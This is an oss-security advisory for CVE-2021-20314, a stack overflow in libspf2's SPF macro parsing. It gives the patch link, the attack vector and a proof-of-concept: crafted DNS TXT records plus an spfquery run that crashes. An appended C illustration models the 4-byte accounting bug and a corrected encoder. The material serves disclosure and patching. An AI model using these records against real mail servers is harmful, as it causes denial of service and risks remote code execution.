Message-ID: <dde792a9-3531-9057-70a4-c4a9b60b90fd@sit.fraunhofer.de>
Date: Wed, 11 Aug 2021 16:41:16 +0200
From: "Philipp Jeitner (SIT)" <philipp.jeitner@....fraunhofer.de>
To: <oss-security@...ts.openwall.com>
Subject: CVE-2021-20314: Remote stack buffer overflow in libspf2

#### Description

Stack buffer overflow in libspf2 versions below 1.2.11 when processing certain SPF macros can lead to denial of service and potentially code execution via maliciously crafted SPF explanation messages.

CVE-2021-20314 has been assigned to this issue.

#### Attack type

Remote

#### Impact

(x) Code Execution
(x) Denial of Service

#### Attack vector(s):

Attackers need to cause a mail server to process a malicious SPF record, e.g. by sending an email from an attacker-controlled domain. Thus, any mail server accepting mails and processing them via libspf2 is vulnerable.

#### Patch

The issue has been fixed in GitHub commit c37b7c1:
https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef

An updated version of libspf2 (1.2.11) which also fixes other security-related issues is available from GitHub (https://github.com/shevek/libspf2). The libspf2 website (https://www.libspf2.org/download.html) and the latest release there are NOT UPDATED YET.

#### Discoverer(s)/Credits

Philipp Jeitner and Haya Shulman, Fraunhofer SIT
philipp.jeitner@....fraunhofer.de
haya.shulman@....fraunhofer.de

#### Reference(s)

- libspf2: https://www.libspf2.org/, https://github.com/shevek/libspf2
- patch: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef
- Injection Attacks Reloaded: Tunneling Malicious Payloads over DNS
  https://www.usenix.org/conference/usenixsecurity21/presentation/jeitner

#### Details and information to reproduce the vulnerability

To reproduce, set the SPF record of a domain you control as listed below:

    example.com.     300 IN TXT "v=spf1 exp=exp.example.com"
    exp.example.com. 300 IN TXT "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Then trigger SPF processing in libspf2, e.g. via the command line `spfquery` tool:

    # spfquery --sender someone@...mple.com -ip 1.2.3.4
    *** stack smashing detected ***: terminated
    Aborted (core dumped)

The record causes a 4-byte stack buffer overflow of the local variable `buf` in `SPF_record_compile_macro`, which is responsible for parsing the potential macros included in the SPF explanation message. The overflow is caused by an incorrect buffer length adjustment in the `SPF_INIT_STRING_LITERAL` macro, which places a 4-byte header of type `SPF_data_str` into the buffer inside `buf` without decreasing the available size `ds_avail` by 4. Exploiting this vulnerability therefore allows the attacker to overwrite up to 4 bytes on the stack of `SPF_record_compile_macro` directly after `buf`.
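The accounting error described above is easy to reproduce in miniature. The following is an added illustration, not libspf2's code: it models a 4-byte literal header (a simplified stand-in for `SPF_data_str`, not its real layout) written in front of an explanation string. `overflow_with_stale_avail` computes, without touching memory, how far a copy bounded by the un-adjusted `avail` would run past the buffer, and `encode_literal` shows the corrected accounting, which reserves the header before bounding the copy and rejects a literal that does not fit. All names, the header layout and the reject-instead-of-truncate behaviour are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical 4-byte header; a simplified stand-in for libspf2's
 * SPF_data_str, not its real layout. */
typedef struct {
    uint8_t  type;   /* 0 = literal text (macros are not modelled here) */
    uint8_t  flags;  /* unused in this model */
    uint16_t len;    /* number of literal bytes that follow the header */
} lit_hdr;

#define HDR_SIZE ((size_t)sizeof(lit_hdr))
#define DS_TYPE_LITERAL 0

/* Buggy accounting, computed without writing anything: the header is placed
 * in the buffer, but `avail` is not reduced by HDR_SIZE before the literal
 * is copied, so the copy is bounded by a stale limit. Returns how many bytes
 * would land past the end of a buffer that has `avail` free bytes. */
size_t overflow_with_stale_avail(size_t avail, size_t lit_len)
{
    size_t copy  = lit_len < avail ? lit_len : avail; /* stale bound */
    size_t total = HDR_SIZE + copy;
    return total > avail ? total - avail : 0;         /* at most HDR_SIZE */
}

/* Corrected accounting: reserve the header first, then bound the copy by
 * what is actually left. Writes header + literal into out[0..*avail) and
 * returns bytes written, or -1 when it does not fit (nothing is written). */
int encode_literal(uint8_t *out, size_t *avail, const char *lit, size_t lit_len)
{
    if (*avail < HDR_SIZE) return -1;
    size_t left = *avail - HDR_SIZE;            /* the adjustment the bug omits */
    if (lit_len > left || lit_len > UINT16_MAX) return -1;

    lit_hdr h = { DS_TYPE_LITERAL, 0, (uint16_t)lit_len };
    memcpy(out, &h, HDR_SIZE);
    memcpy(out + HDR_SIZE, lit, lit_len);
    *avail -= HDR_SIZE + lit_len;
    return (int)(HDR_SIZE + lit_len);
}

/* Helper for experiments: encode a constructed literal of lit_len 'A's into
 * a fresh buffer of bufsize bytes and return the encoder's result. */
int try_encode(size_t bufsize, size_t lit_len)
{
    uint8_t *buf = malloc(bufsize ? bufsize : 1);
    char    *lit = malloc(lit_len ? lit_len : 1);
    if (!buf || !lit) { free(buf); free(lit); return -1; }
    memset(lit, 'A', lit_len);
    size_t avail = bufsize;
    int n = encode_literal(buf, &avail, lit, lit_len);
    free(buf);
    free(lit);
    return n;
}

int main(void)
{
    /* Constructed input: a 300-byte explanation literal, like the 'A' record above,
     * against a 256-byte buffer. */
    printf("stale accounting would overflow by %zu bytes\n",
           overflow_with_stale_avail(256, 300));
    int n = try_encode(256, 300);
    printf("corrected encoder: %s\n", n < 0 ? "rejected (does not fit)" : "encoded");
    printf("a 252-byte literal fills the buffer exactly: %d bytes\n", try_encode(256, 252));
    return 0;
}
```

The point the model makes is the bound on the damage: whatever the literal's length, the stale bound can never push the copy more than `HDR_SIZE` (4) bytes past the end, which is why the advisory speaks of "up to 4 bytes". A detection-side check for the same class of bug is to assert, after every header placement in a buffer-building loop, that `ds_avail` plus bytes written still equals the buffer size.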